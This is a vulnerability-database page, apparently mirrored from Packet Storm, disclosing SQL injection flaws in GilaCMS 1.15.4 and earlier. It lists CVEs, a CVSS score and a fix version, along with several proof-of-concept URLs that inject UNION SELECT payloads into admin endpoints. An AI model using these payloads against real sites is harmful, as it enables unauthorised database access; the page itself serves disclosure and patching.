Lucene search
GilaCMS 1.15.4 SQL Injection
🗓️ 22 Dec 2023 00:00:00Reported by Louise Ng, Chris ChanType 
packetstorm🔗 packetstormsecurity.com👁 290 Views
GilaCMS 1.15.4 SQL Injection - Multiple vulnerabilities allowing remote attacker to execute web script
Show more
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | GilaCMS 1.15.4 SQL Injection Vulnerability | 22 Dec 202300:00 | – | zdt |
 | CVE-2020-26624 | 2 Jan 202400:00 | – | cvelist |
| CVE-2020-26623 | 2 Jan 202400:00 | – | cvelist |
| CVE-2020-26625 | 2 Jan 202400:00 | – | cvelist |
 | SQL Injection | 4 Jan 202404:50 | – | veracode |
| SQL Injection | 4 Jan 202405:12 | – | veracode |
| SQL Injection | 4 Jan 202405:01 | – | veracode |
 | Sql injection | 2 Jan 202422:15 | – | prion |
| Sql injection | 2 Jan 202422:15 | – | prion |
| Sql injection | 2 Jan 202422:15 | – | prion |
10
`Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabilties
Affected CMS: GilaCMS
Affected Version: <= 1.15.4
CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625
CVSS Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd
Multiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.
Proof of Concept:
Attack Vector 1:
After login into admin portal, go to administration>widget and use wiget area filter to perform search
Sample payload:
http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20
Attack Vector 2:
After login into admin portal, go to edit post/page/role/user/category/userpost
Sample payload:
http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20
http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20
http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_update
http://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_update
Attacker Vector 3:
After login into admin portal, go to Content>Posts and use Users filter to perform search
Sample payload:
http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20
Recommendation
Update to v2.0.1
http://gilacms.com
https://github.com/GilaCMS/gila
https://github.com/GilaCMS/gila/security/policy
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 Dec 2023 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.00192